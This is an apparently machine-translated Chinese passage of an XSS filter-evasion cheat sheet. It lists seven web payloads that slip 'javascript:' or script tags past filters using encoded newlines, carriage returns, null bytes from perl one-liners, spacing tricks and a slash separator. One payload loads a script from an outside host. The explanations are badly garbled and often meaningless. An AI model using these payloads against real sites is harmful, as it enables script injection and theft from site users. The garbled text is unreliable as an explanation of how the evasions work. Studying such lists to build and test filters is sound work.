1.分手XSS嵌入换行符。一些网站声称任何识字课09-13(十进制)将会为这次袭击。那是不正确的。只有09(横向标签),10(换行符),13(回车)工作。看到ascii图的更多细节

代码:<IMG SRC="jav&#x0A;ascript:alert('XSS');">

2.嵌入式回车分手XSS(注:上述我使这些字符串超过他们必须因为零点可以省略。我经常看见过滤器假定十六进制12编码必须两个或三个字符,真正的规则是1字符

 代码:<IMG SRC="jav&#x0D;ascript:alert('XSS');">

3.注射用折线JavaScript ASCII回车(同上只有一个更极端的例子XSS矢量)这不是空间就是这三个角色如上所述
 代码:<IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
"
>
4.空分割JavaScript指令

代码:perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

5.打破了跨站脚本无效向量。这是一种很罕见的XSS***载体使用空字符。你可以把HTML本身使用相同的nulls

代码:perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

6.空间和meta识字课之前在图像JavaScript XSS(这是有益的,如果这个模式匹配不考虑空间单词“JavaScript:”——因为这不会是正确的,而且可以提供一种错误的假设,我们不可能拥有这样一个之间的空间报价和“JavaScript:“关键字

代码:<IMG SRC=" &#14;  javascript:alert('XSS');">

7.Non-alpha-non-digit XSS。 阅读时,我虽然HTML解析我发现呈non-alpha-non-digit不是有效的关键字,因此一个HTML后认为它是一个空格或一个HTML标签后太表征。问题在于某些XSS过滤器假设标签他们寻找碎空白。例如“s”<脚本\ != " <脚本/ XSS \ s
代码:<SCRIPT/XSS SRC="www.xxx.com/xss.js"></SCRIPT>